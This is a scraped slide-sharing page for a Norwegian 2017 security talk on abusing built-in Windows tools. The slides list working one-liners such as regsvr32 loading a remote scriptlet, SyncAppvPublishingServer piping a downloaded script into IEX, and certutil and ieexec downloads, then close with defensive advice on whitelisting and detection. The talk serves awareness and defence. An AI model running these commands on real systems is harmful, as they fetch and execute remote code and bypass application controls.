Hacke windows med windows - avanserte angrep

O
Oddvar Moe
Hacke Windows med Windows – Avanserte angrep MTUG 10.09.2017
WHOAMI • Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker • Jobbet med IT siden 2000 • Første MCP når jeg var 16 • Work @ Advania – Chief Technical Architect • Gift/barn/hund • Blog: http://oddvar.moe • Twitter: @oddvarmoe
Angrep – Hvordan skaffe seg første tilgang • Tradisjonelt angrep • Sende mail • Link • Vedlegg • Phishing side • Ekstern server • OWA • ADFS • Skype • 3.parts
Hacke windows med windows - avanserte angrep
Hacke windows med windows - avanserte angrep
Trenger du flere eksempler? • https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C9 6A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EED CE316E4C%21109&o=OneUp
Call to Action!
Call to Action! • Innstilling i Office (2013/2016)
Hva er bak enable content? • Her kommer det interessante • Hva gjør de? • Vi skal se på en del eksempler • Real attacks • «Future attacks»
Hva mener du med «Hacke Windows med Windows» • Angripere har skiftet fokus • Benytter Windows funksjonalitet for å utføre angrep • Misbruker godkjente verktøy • Ikke lengere malware.exe
REGSVR32.exe • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll • Proxy aware
REGSVR32.exe • Kalkulator: • regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6 b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2 a66/Backdoor-Minimalist.sct scrobj.dll
rundll32.exe • rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert('User%20Group%20Agder'); • (Blir nå tatt av Windows Defender) • Detaljert forklaring: https://stackoverflow.com/questions/25131484/rundll32-exe- javascript
Rundll32.exe • Kalkulator: • rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");w indow.close()");
SyncAppvPublishingServer.exe • SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX • Kommando injection feil
SyncAppvPublishingServer.exe • Kalkulator: • SyncAppvPublishingServer.exe "n;(calc) • cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'" • Bevis på Powershell: • SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
Certutil.exe • certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt x64.dll • certutil -Class scrobj.dll
Noen andre uten demo • msbuild.exe pshell.xml • regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll • regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll • InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll • msxsl.exe customers.xml script.xsl
Min research • BGINFO.exe bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt Video: https://youtu.be/OiKhgSxWKUM • CMSTP.exe UAC Bypass og DLL Loading https://msitpros.com/wp- content/uploads/2017/08/WebDavDLLLoadBlog.gif
Min research • CVE-2017-8625 • hh.exe /? (Hva gjør denne tror du?) • Device Guard bypass • https://msitpros.com/wp-content/uploads/2017/08/CVE-2017- 8625.gif
Kode i kode
EXE filer som kan starte andre EXE filer • Eksempler: • scriptrunner.exe -appvscript calc.exe • forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe • ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe) • bash.exe -c calc.exe (Linux i Windows)
Proxy • netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
Hacke windows med windows - avanserte angrep
Hva burde du gjøre? • Application whitelisting • Device Guard • AppLocker • Husk AppLocker bypass listen min: • https://github.com/api0cradle/UltimateAppLockerByPassList • Implementer deteksjon (Splunk / WDATP / ATA)
SELV OM DU KAN RANE EN BANK MED PENN OG PAPIR, BETYR DET IKKE AT DU IKKE SKAL HA ET HVELV!
SHAMELESS PLUG!
Takk for meg!
1 of 28

Hacke windows med windows - avanserte angrep

Technology

Foredrag holdt for Office 365 User Group I Agder 14. september 2017

O
Oddvar Moe

Recommended

NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsOddvar Moe
669 views30 slides
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
12.9K views35 slides
Bug bountyBug bounty
Bug bountyn|u - The Open Security Community
5.2K views14 slides
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingMuhammad Khizer Javed
129 views15 slides
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
102 views43 slides
How To Build The Perfect Backtrack 4 Usb DriveHow To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb Drivekriggins
2.3K views94 slides

More Related Content

What's hot

Attacking DrupalAttacking Drupal
Attacking DrupalGreg Foss
20.2K views104 slides
SOC trainingSOC training
SOC trainingKirill Ermakov
1.7K views21 slides

What's hot(20)

Attacking DrupalAttacking Drupal
Attacking Drupal
Greg Foss20.2K views
SOC trainingSOC training
SOC training
Kirill Ermakov1.7K views
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Mazin Ahmed571 views
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Shubham Gupta292 views
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates811 views
Is rust language really safe? Is rust language really safe?
Is rust language really safe?
Nullbyte Security Conference414 views
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss2.5K views
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
Andrew Sorensen447 views
MR201504 Web Defacing Attacks Targeting WordPressMR201504 Web Defacing Attacks Targeting WordPress
MR201504 Web Defacing Attacks Targeting WordPress
FFRI, Inc.3.3K views
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
Michael Hendrickx1K views
Devouring Security XML Attack surface and DefencesDevouring Security XML Attack surface and Defences
Devouring Security XML Attack surface and Defences
gmaran235.2K views
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
Otto Kekäläinen2.5K views
Powershell'in Karanlık YüzüPowershell'in Karanlık Yüzü
Powershell'in Karanlık Yüzü
Halil Dalabasmaz615 views
Keep Your SIte SecureKeep Your SIte Secure
Keep Your SIte Secure
Michele Butcher-Jones579 views
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council322 views
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
Barry Dorrans718 views
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd7.9K views
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
Quek Lilian512 views
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta2.4K views
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
Himanshu Kumar Das6.3K views

Similar to Hacke windows med windows - avanserte angrep

Owasp tdsOwasp tds
Owasp tdssnyff
647 views36 slides

Similar to Hacke windows med windows - avanserte angrep(20)

Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
Sumedt Jitpukdebodin1.2K views
Owasp tdsOwasp tds
Owasp tds
snyff647 views
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Andi Rustandi Djunaedi264 views
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
Michael Gough1.7K views
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch1.1K views
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd200.6K views
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
Octavio Paguaga238 views
Ci for i-os-codemash-01.2013Ci for i-os-codemash-01.2013
Ci for i-os-codemash-01.2013
Kevin Munc1.9K views
Bsides tampaBsides tampa
Bsides tampa
Octavio Paguaga302 views
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar2.2K views
Debugging, Monitoring and Profiling in TYPO3Debugging, Monitoring and Profiling in TYPO3
Debugging, Monitoring and Profiling in TYPO3
AOE6.7K views
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware Archaeologist
Michael Gough6.1K views
Alexey Sintsov- SDLC - try me to implementAlexey Sintsov- SDLC - try me to implement
Alexey Sintsov- SDLC - try me to implement
DefconRussia1.1K views
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019
Paul Haskell-Dowland324 views
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat635 views
Blue Teaming on a Budget of ZeroBlue Teaming on a Budget of Zero
Blue Teaming on a Budget of Zero
Kyle Bubp646 views
Software Engineering in StartupsSoftware Engineering in Startups
Software Engineering in Startups
Dusan Omercevic1K views
Testing mit Codeception: Full-stack testing PHP frameworkTesting mit Codeception: Full-stack testing PHP framework
Testing mit Codeception: Full-stack testing PHP framework
SusannSgorzaly1.5K views
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
Michael Gough845 views
openQA hands on with openSUSE Leap 42.1 - openSUSE.Asia Summit ID 2016openQA hands on with openSUSE Leap 42.1 - openSUSE.Asia Summit ID 2016
openQA hands on with openSUSE Leap 42.1 - openSUSE.Asia Summit ID 2016
Ben Chou804 views

More from Oddvar Moe

App-o-Lockalypse now!App-o-Lockalypse now!
App-o-Lockalypse now!Oddvar Moe
811 views58 slides

More from Oddvar Moe(8)

Recently uploaded

CXL at OCPCXL at OCP
CXL at OCPCXL Forum
158 views66 slides
Web Dev - 1 PPT.pdfWeb Dev - 1 PPT.pdf
Web Dev - 1 PPT.pdfgdsczhcet
44 views45 slides

Recently uploaded(20)

CXL at OCPCXL at OCP
CXL at OCP
CXL Forum158 views
"Thriving Culture in a Product Company — Practical Story", Volodymyr Tsukur"Thriving Culture in a Product Company — Practical Story", Volodymyr Tsukur
"Thriving Culture in a Product Company — Practical Story", Volodymyr Tsukur
Fwdays34 views
Web Dev - 1 PPT.pdfWeb Dev - 1 PPT.pdf
Web Dev - 1 PPT.pdf
gdsczhcet44 views
Green Leaf Consulting: Capabilities DeckGreen Leaf Consulting: Capabilities Deck
Green Leaf Consulting: Capabilities Deck
GreenLeafConsulting147 views
"Quality Assurance: Achieving Excellence in startup without a Dedicated QA", ..."Quality Assurance: Achieving Excellence in startup without a Dedicated QA", ...
"Quality Assurance: Achieving Excellence in startup without a Dedicated QA", ...
Fwdays27 views
TE Connectivity: Card Edge InterconnectsTE Connectivity: Card Edge Interconnects
TE Connectivity: Card Edge Interconnects
CXL Forum87 views
"AI Startup Growth from Idea to 1M ARR", Oleksandr Uspenskyi"AI Startup Growth from Idea to 1M ARR", Oleksandr Uspenskyi
"AI Startup Growth from Idea to 1M ARR", Oleksandr Uspenskyi
Fwdays20 views
The details of description: Techniques, tips, and tangents on alternative tex...The details of description: Techniques, tips, and tangents on alternative tex...
The details of description: Techniques, tips, and tangents on alternative tex...
BookNet Canada60 views
.conf Go 2023 - SIEM project @ SNF.conf Go 2023 - SIEM project @ SNF
.conf Go 2023 - SIEM project @ SNF
Splunk134 views
Architecting multi-cloud ready applicationsArchitecting multi-cloud ready applications
Architecting multi-cloud ready applications
Swaminathan Vetri43 views
Business Analyst Series 2023 - Week 2 Session 3Business Analyst Series 2023 - Week 2 Session 3
Business Analyst Series 2023 - Week 2 Session 3
DianaGray10290 views
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
Splunk66 views
.conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär).conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär)
.conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär)
Splunk143 views
ThroughputThroughput
Throughput
Moisés Armani Ramírez25 views
Micron CXL product and architecture updateMicron CXL product and architecture update
Micron CXL product and architecture update
CXL Forum21 views
MemVerge: Past Present and Future of CXLMemVerge: Past Present and Future of CXL
MemVerge: Past Present and Future of CXL
CXL Forum98 views
Match Is the New Sell in The Digital World by Amazon Product leaderMatch Is the New Sell in The Digital World by Amazon Product leader
Match Is the New Sell in The Digital World by Amazon Product leader
Product School108 views
Empathic Computing: Delivering the Potential of the MetaverseEmpathic Computing: Delivering the Potential of the Metaverse
Empathic Computing: Delivering the Potential of the Metaverse
Mark Billinghurst338 views
Samsung: CMM-H Tiered Memory Solution with Built-in DRAMSamsung: CMM-H Tiered Memory Solution with Built-in DRAM
Samsung: CMM-H Tiered Memory Solution with Built-in DRAM
CXL Forum89 views
PyCon ID 2023 - Ridwan Fadjar Septian.pdfPyCon ID 2023 - Ridwan Fadjar Septian.pdf
PyCon ID 2023 - Ridwan Fadjar Septian.pdf
Ridwan Fadjar161 views

Hacke windows med windows - avanserte angrep

Editor's Notes

  1. regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct scrobj.dll
  2. D